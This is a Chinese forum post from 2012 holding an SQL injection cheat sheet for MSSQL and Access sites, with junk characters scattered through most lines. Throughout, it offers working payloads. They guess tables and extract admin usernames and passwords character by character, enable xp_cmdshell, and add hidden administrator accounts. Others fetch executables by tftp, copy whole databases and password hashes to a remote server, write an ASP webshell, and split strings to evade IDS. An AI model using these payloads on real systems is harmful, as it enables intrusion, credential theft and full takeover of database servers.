1..判断有无注入点
% y4 N9 F) [6 P& {) Z H; and 1=1 and 1=2 : F- b& T* Q) p- M/ t: S
4 Q1 }) V+ c" G7 c; g8 ^
6 {2 a7 t p, Z' ?/ z
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
. ^& c- t1 _ h) [& h$ L7 f C/ M$ Y- nand 0<>(select count(*) from *)
1 ^; p# h1 k, Z$ z8 u# [- b3 vand 0<>(select count(*) from admin) ---判断是否存在admin这张表 3 g8 o6 o- {7 Z( B& d
1 _9 J, n) J. e8 M2 T
1 u5 w" {& o2 m* n7 C% a p. q
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
8 e( S' m, P5 c% t4 rand 0<(select count(*) from admin)
3 K; u3 F6 U9 l4 i9 }; l( F$ sand 1<(select count(*) from admin) v4 L$ o; m/ H1 e
猜列名还有 and (select count(列名) from 表名)>0
7 t- v. o+ y& j4 Q) K9 v' ]8 H6 X- G, q* O3 h' m5 ?
" L: q6 Q* n: N, V, z4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
$ B& T* `# G2 ~! K: ~and 1=(select count(*) from admin where len(*)>0)--
# Z" _1 x: r9 z- E4 k2 |; d# _and 1=(select count(*) from admin where len(用户字段名称name)>0)
( V$ T4 f- W; S/ [5 w3 r/ |: B" ?and 1=(select count(*) from admin where len(密码字段名称password)>0)
0 v5 _" ?3 P! g" B% X3 j' I- ^& g- x# J2 ^$ j, L) o
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
. e2 B2 v8 L$ A, m& f6 o" Y% e& P; y( cand 1=(select count(*) from admin where len(*)>0) * X9 W( j6 U; S5 P5 t9 Q0 }
and 1=(select count(*) from admin where len(name)>6) 错误 # U, ]7 Z, l/ m; H a) b
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
! }7 x3 e: m9 G3 Qand 1=(select count(*) from admin where len(name)=6) 正确 & f( Y) U0 l/ {2 O V6 w# O! I# s" Q: W
. R7 |( Z8 Y5 I: u( P" o4 r9 t1 n
and 1=(select count(*) from admin where len(password)>11) 正确
% H: L6 H: O6 x" t. t) ~and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 ' w. x/ ]; L/ F" x L3 \. C
and 1=(select count(*) from admin where len(password)=12) 正确 + p; N$ b6 M4 H/ Q x# ^' g8 i- ]
猜长度还有 and (select top 1 len(username) from admin)>5$ U+ J* ^2 Z+ A# z3 x- _' H
/ T0 N7 t% A( O/ N# ~/ {' B7 x4 s# L9 `" T( k
6.猜解字符
4 u w$ f n7 a5 G1 O$ rand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 . M* F- ?6 {8 q+ i! R
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 ) a+ T; I" G- c1 F/ y. r
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
; B8 l! Q8 ^( N+ A+ e7 j% z# O; h, j% r' s Z1 @9 {$ ^
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算, K5 s# L5 l- Y( a; ^+ B0 B
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- ( A7 J* m& k) M3 @1 Y: b$ W/ U
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 1 S2 ?; @% C. {
' {) `2 a+ y5 bgroup by users.id having 1=1-- 7 ?, h3 Q3 x, i4 l
group by users.id, users.username, users.password, users.privs having 1=1-- 2 ^8 l1 X" A8 V
; insert into users values( 666, attacker, foobar, 0xffff )-- 5 i X2 L( k* h% q8 B4 Z
) f, c2 ]5 i# nUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
$ {* ^2 k" Z3 gUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- ; T7 t: K) C1 W. U
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- 2 y2 z1 u6 b4 H
UNION SELECT TOP 1 login_name FROM logintable- l7 ~/ W, D" u( \* U
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
' F8 p8 \; w6 V
+ F+ H$ D/ {1 J2 I看服务器打的补丁=出错了打了SP4补丁 - S3 e. G% F; x2 n
and 1=(select @@VERSION)--
3 N( j a9 J$ |' T7 e
8 N( h# S# E* V看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
( i9 V) L" v) b2 ^- a4 f+ S4 V8 Mand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- , N; p, v5 Z& S# h) ]- P8 P- R5 b/ q
( J6 v. Z- l9 t; D% F& Q/ i
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) , ]4 ^* `6 A J
and sa=(SELECT System_user)-- ) l4 K; {3 {2 F. S9 o
and user_name()=dbo-- $ A. E; {2 I0 M
and 0<>(select user_name()-- L# F& s$ {, }
2 u8 |1 {& `) h" s. U+ B1 B' X
看xp_cmdshell是否删除 ! g9 d$ v& b% q Y, }1 B
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
; M; [" b# o7 N# X
% }) ~; s5 K+ \$ _8 ]9 r- kxp_cmdshell被删除,恢复,支持绝对路径的恢复
* X" Z D- {: p0 n) M;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- 1 c& U! o( W3 T, |) m! @2 g! h4 ]
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
. G* `/ X1 h6 Y, {$ ~0 | e1 F
9 G4 J& L' D4 M t6 v反向PING自己实验
* ~% S i( n' h, I9 H1 U1 ~;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
; n% i6 Y6 r# g# n" l' z% N& q* ]
/ r1 U1 x7 ` O' K# e% ]加帐号 : \8 Y( {( t4 O, M! K8 w; j
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
; X% ` P% v" f4 n: `1 p
7 y2 J3 S& w# B. R: k% K9 K# V创建一个虚拟目录E盘: ' d" ]2 i, @7 t7 T( A6 X$ g/ D
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- 3 Y( U. Z: N& {3 u2 c) C# T: y
3 O. E, G- V( j8 i* Z; \7 s" N访问属性:(配合写入一个webshell)
% Y, S+ t6 H" k+ H) J/ odeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse % r# U, Y7 R8 o. {
# v; m% n8 N8 U' l# ?# p. j q
) v6 ? I$ N# W6 c
MSSQL也可以用联合查询
2 C8 f; w, L5 g6 j* e, ]. J# J$ n?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
6 @# m( A% J6 i+ F?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) - A2 P: Z( h" o* [; Y2 _
; _3 J) d/ s+ s- z/ y/ ^0 U
" Z- c. U1 h3 Z6 [1 t' i
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交 * g9 X( |$ e7 A5 E; [% Y" N6 C
7 p# x. M" M$ M/ E4 E; ]6 K/ [
# [; K& {$ g# j; \5 J4 l& [
4 t( G) l7 x7 e7 s2 Q1 H6 ?得到WEB路径
+ y7 D, c" ]; ^" Y+ Q9 A;create table [dbo].[swap] ([swappass][char](255));-- : o9 M) Y( L/ H- A! e: r
and (select top 1 swappass from swap)=1-- 9 |# F) @) |. @! s4 G0 ^/ V
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- % {5 W" ? G; u' K. V& \
;use ku1;-- 7 H) p3 I/ b& `& ^' x
;create table cmd (str image);-- 建立image类型的表cmd " }* d6 M) t! P, Y+ z" T ]7 P) ]7 u
6 X; _- T( H$ m$ {' d存在xp_cmdshell的测试过程: 5 R1 v' H# Z0 }, d3 P
;exec master..xp_cmdshell dir
4 R9 @6 _$ M* ?2 L7 x6 X8 M;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
" v- U: A$ Y* r! _;exec master.dbo.sp_password null,jiaoniang$,1866574;-- 5 A& }( g& j& Y: @3 n6 ~4 V
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
2 y1 g6 z3 j8 o0 g* q: a5 c# y' E3 f. e;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
" [4 s. ?9 G! }! R& I/ w2 Y7 }4 Z;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
' L, Q+ `( s# b$ b. E! h" q1 Texec master..xp_servicecontrol start, schedule 启动服务 1 i% Q" f; T0 J
exec master..xp_servicecontrol start, server 0 z; ~' e0 L% p% J9 J/ W @$ R, E
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
/ |' s4 D G& U1 ?* z2 k. @" ^;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add 2 S! |7 z& Z0 D$ i# a7 F6 k
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
- g9 D: c* W0 w/ m1 L
2 y! p x0 y4 n6 h7 L;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ - O! D$ L: B3 |
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ * G: F0 q! I9 H9 L, ?* i
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat % j3 R3 f! E7 C% s }5 R7 R9 Q
如果被限制则可以。
5 u- Z X9 n1 m* d3 N9 q, Yselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax) " }/ F8 {& u2 s* Z) Y
4 H1 M/ L7 _- i D2 e查询构造: / R+ E0 F0 e5 Y9 o6 K
SELECT * FROM news WHERE id=... AND topic=... AND .....
1 }: S3 N! @0 h( r7 l/ \$ Qadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 5 H! ]4 D& Z- T, {: c+ X3 P6 A: x
select 123;-- % B& [* P; `0 @8 ^
;use master;--
! J: N7 ^( v+ J:a or name like fff%;-- 显示有一个叫ffff的用户哈。 # I P# {( u3 { _8 e- v
and 1<>(select count(email) from [user]);--
+ W( f- d% r+ e;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- + ^5 B+ c. z9 f0 Q; v) I$ Q
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- & X, m! b$ g9 g+ ?
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- ! b! f5 o, e* @. [ w F
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
" x# r: } U' E; O/ ^ M+ i;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- : ]! x; A( Y7 ]
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- . U( Y" d+ l4 S: k' p& L, g
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 , @+ n3 P9 t; {7 e; ~4 \# U; r
通过查看ffff的用户资料可得第一个用表叫ad
) N! d" L" z- l& k; [% g然后根据表名ad得到这个表的ID 得到第二个表的名字
( w" h `0 K; y; a( k- L+ E4 s7 V W7 `# t) T5 t
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
. ~; x2 b( [( e y- oinsert into users values( 667,123,123,0xffff)--
+ J) \1 m- \/ ]$ Einsert into users values ( 123, admin--, password, 0xffff)--
! z' \: @& v. X" O k% B2 v;and user>0
1 N! _% Y2 `3 {. V;and (select count(*) from sysobjects)>0
* ~4 G' t& [1 A; _;and (select count(*) from mysysobjects)>0 //为access数据库 7 x$ @/ x9 g9 X% r6 M- T
1 J6 p! s& v$ @0 S: e
枚举出数据表名 ( n. ^4 l8 J# s
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
# `% X. i, X8 ~0 l' r5 l% Y( o这是将第一个表名更新到aaa的字段处。 ! v" h& \$ J; \/ c/ J6 |. d% b% C
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
/ x3 K- _% n, X! i: H K" Q;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
& K# Z5 \7 ^( @1 k9 n5 `然后id=1552 and exists(select * from aaa where aaa>5) 2 J( O9 N* m1 G i/ c8 c) [+ D! I
读出第二个表,一个个的读出,直到没有为止。 ! o& R5 v! i8 b" _
读字段是这样: 6 }& j+ |; m# G8 D A
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
, M$ M4 \( h# o然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
1 ]1 L2 d- Q0 a: |;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
( ^9 T8 K. j: v1 v# N# z- k4 x然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
$ M( e$ Y$ z; y6 u4 q7 U
* M' P) ~/ r6 w8 b5 h+ b7 a- J[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] ; L7 l( m* ~- b5 U! K, J0 L
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) 5 a" n( v0 D9 N8 u6 a! `2 q5 X: i
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
3 I3 Q" p( R, r6 ~! ? ~$ e% f* p2 }1 L# R* ]! t# `
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
9 t" e: \7 E2 @' Y& e& b! ?2 H; v5 Iupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
) o0 f0 k: t7 f" O' T- z+ ~% @# V. y% P5 W. r
绕过IDS的检测[使用变量]
( s0 {/ D& P0 U& L7 A' _( f" v;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
; D% a: \% K0 b+ M- \9 N* P;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
/ i4 ]/ ^. ~% H& q( E: q, Q7 O- `. v8 G2 G7 v2 k; I$ t
1、 开启远程数据库 ( u( z" k% L9 U/ s& @7 Q p
基本语法 $ N: U* v! E4 M9 Q) p
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
$ w) }: y' K* l- }8 c3 n$ c参数: (1) OLEDB Provider name * P3 N# i- W6 L) Q7 _2 Y }
2、 其中连接字符串参数可以是任何端口用来连接,比如
. S* T' _" K7 j" P% Kselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table ( H/ P" K4 J+ c$ r
3.复制目标主机的整个数据库insert所有远程表到本地表。 2 v/ v$ e! G3 z) y5 R+ r# c! V+ q
" I0 Q0 R% @- B! u2 @8 ~
基本语法:
/ e5 X8 G+ l4 w& X4 g1 Einsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 : c) J! u5 t, t, n# M* N* J
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
! ]2 _; \3 e4 q. p# uinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 ( Z1 u7 z3 ]+ \2 C4 \9 i
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) " z4 w% L3 I- K6 F
select * from master.dbo.sysdatabases 7 K, Z7 T/ b. f: R3 C
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) # X& Z4 {) G- ?
select * from user_database.dbo.sysobjects
$ R" H- i/ |$ ^; o1 n" f; ^insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) . f" L; M* I) M( l. L$ w4 c2 f1 R
select * from user_database.dbo.syscolumns 6 k6 b) F( w5 F
复制数据库:
2 s3 s1 H& E/ _, r5 n7 E5 Winsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 5 J: t/ z* S0 B1 N( S3 K2 V
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
% J( D/ R& C5 A8 }( C6 ]: d w: y# [; \' c8 X; v
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: , s3 m; a6 T" \+ M3 o d0 g4 r
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins $ z8 j! V/ L0 q$ T. ]
得到hash之后,就可以进行暴力破解。 7 P( @$ P( l3 N0 G! [- {, R
( v- w9 O ]5 R4 r2 K( X* Q7 f' m遍历目录的方法: 先创建一个临时表:temp 0 ?+ D0 D3 H; F% T. }+ v
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3 r" J) ]2 ~# O' s' @
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 * r( z: V0 r! U e; L& Z
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 ' e7 K: N' `; R/ `
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 ]( r0 ~+ k5 C+ _
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
* A$ i {! ~& a9 y |" L6 ^% \5 ^;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
0 M# n* @' z( [( Y& F;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
; I9 t' ~! U# Z( M;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
5 G u" N3 p8 M6 G;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) " |) ~, t' S5 R) b
写入表:
5 }" h t5 N6 s! F语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- - u$ k& o6 n4 w4 S
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
2 X. x ^( v. l7 v" R2 {% q5 T4 n) n语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
- P; P6 Y9 ?: I, ?# [+ [# v语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
2 ]6 {' n% n" t; j% o) w语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
i3 f# G, s: V$ y语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
" u0 N# @1 ~ ]: f5 c! V8 ?语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
) `/ f# n) D- o5 n: U. Q5 g. H: B语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
. H& d5 Q' ]5 R( S语句9:and 1=(SELECT IS_MEMBER(db_owner));--
) N" [: e t: R3 T" ^( Z! h: [
( Y0 \* O4 ?- K3 P2 U; S3 C& w把路径写到表中去: " X$ q5 j' s) i) s a4 v! Z
;create table dirs(paths varchar(100), id int)--
6 A# [8 W1 e! r* C;insert dirs exec master.dbo.xp_dirtree c:\--
/ q4 F2 Z) w+ T7 jand 0<>(select top 1 paths from dirs)--
" ?2 _1 J! Y) K+ l2 E6 }and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- - D) p" g- a; _8 o% P
;create table dirs1(paths varchar(100), id int)--
9 F: m) b; ~" E1 |;insert dirs exec master.dbo.xp_dirtree e:\web-- ( X3 s" {/ w0 g/ ]* G. H" k
and 0<>(select top 1 paths from dirs1)--
1 }' G7 t; Z) G4 J; m0 i5 G6 ~0 @ D4 _
把数据库备份到网页目录:下载
0 A- A3 G6 }5 `) g3 I: |;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
2 ~; Y: P M0 j& E [( T+ K5 j4 g* j7 R1 _, c [5 |* o
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) $ K$ D0 X9 m6 [ e
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 2 ?0 W; ?$ i q- o) i' C* F
and 1=(select user_id from USER_LOGIN)
& X) q, c1 ]7 B8 M8 }9 K0 Y4 h$ ~and 0=(select user from USER_LOGIN where user>1) K" p6 g2 t, A$ r7 o; N$ U
5 A0 y2 O/ T1 o1 A0 i" I
-=- wscript.shell example -=-
7 i4 ?* @4 |3 p1 j3 _8 Kdeclare @o int 5 R4 O5 E- {, V% N
exec sp_oacreate wscript.shell, @o out
. ~- C8 y5 l' b. zexec sp_oamethod @o, run, NULL, notepad.exe
. U9 E# Y0 a5 C+ d% C; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- - o) G, P3 a+ k% E
; K8 H6 s4 d& t5 N2 l* R+ Vdeclare @o int, @f int, @t int, @ret int 4 Q, \5 _( q- l" s W7 }+ \& }) [8 T
declare @line varchar(8000)
. ?+ b0 N% L Q: xexec sp_oacreate scripting.filesystemobject, @o out
7 F: ^2 a, B+ Z) @exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
# d! ?- B+ N+ S o; K3 \exec @ret = sp_oamethod @f, readline, @line out
; L: x& r4 E9 r k* V8 L A9 M. twhile( @ret = 0 )
6 [3 z0 z3 z/ S. k0 M: X3 k) l, sbegin , x% u Y' w! @5 P! c
print @line
9 G# D3 u @: f. O7 ]; I# v- bexec @ret = sp_oamethod @f, readline, @line out
/ A% a5 t! D4 l, y/ lend ' _7 g" i7 A) w0 `5 o+ Y1 m3 w
) n$ r3 v% v T5 {4 ldeclare @o int, @f int, @t int, @ret int 4 |( T1 j8 h: M& a7 S
exec sp_oacreate scripting.filesystemobject, @o out . {/ ~2 J3 Y9 t9 C' Z9 H8 z/ L7 y! A
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
+ S$ `+ }0 {2 l1 z; ^7 K$ _# t; m2 m F1 ~exec @ret = sp_oamethod @f, writeline, NULL,
) H7 ]+ Z- `9 t) ~/ {& Y; h' }7 \0 }6 p<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
1 z- r9 h5 S5 O% U3 L; `( ]# I1 A
6 h+ K; T( q% {# ?. Ideclare @o int, @ret int
8 j8 G; I0 q' P- W. Yexec sp_oacreate speech.voicetext, @o out
8 u9 q0 B: h- [7 E! cexec sp_oamethod @o, register, NULL, foo, bar 8 N% W/ b3 V2 g; p( ~5 H6 Q
exec sp_oasetproperty @o, speed, 150
8 ]* k# R2 l3 lexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 ; k: j5 P: i5 c" A0 c i7 P6 h
waitfor delay 00:00:05
( Y7 J- ~& X8 V, u, c+ ]
0 H: V$ j$ J# j. ~, P; V; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 5 J- |/ |: }- ]9 w
- U" n/ w/ A* T. X( O# ]$ t
xp_dirtree适用权限PUBLIC
% G9 b9 y: f8 y. ]# ]exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
& K$ b. k( y8 R* x6 n8 dcreate table dirs(paths varchar(100), id int)
: {$ k: r+ |, Y建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 6 P& w, a" \# z* N7 u) s
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
6 c! w5 H& t; [: b. z |
发表于 2012-9-15 14:32:40
收藏
支持
反对